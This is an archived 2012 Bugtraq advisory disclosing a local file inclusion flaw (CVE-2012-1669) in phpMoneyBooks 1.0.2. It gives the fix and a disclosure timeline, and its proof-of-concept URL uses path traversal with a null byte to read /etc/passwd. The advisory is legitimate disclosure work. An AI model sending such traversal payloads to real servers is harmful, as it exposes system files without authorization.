lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKCW=4Z1ig+oWuK4E-eTjPGYxLpoL-38AkFyP31gCFYmmWVWoQ@mail.gmail.com>
Date: Thu, 22 Mar 2012 10:38:01 -0400
From: Mark Stanislav <mark.stanislav@...il.com>
To: bugtraq@...urityfocus.com
Subject: 'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - mark.stanislav@...il.com


I. DESCRIPTION
---------------------------------------
A vulnerability exists in index.php for module handling that allows
for local file inclusion using a null-byte attack on the 'module' GET
parameter.


II. TESTED VERSION
---------------------------------------
1.0.2


III. PoC EXPLOIT
---------------------------------------
http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00


IV. NOTES
---------------------------------------
* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for
null-byte attacks to work


V. SOLUTION
---------------------------------------
Upgrade to 1.0.3 or above.


VI. REFERENCES
---------------------------------------
http://phpmoneybooks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669


VII. TIMELINE
---------------------------------------
02/29/2012 - Initial vendor disclosure
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ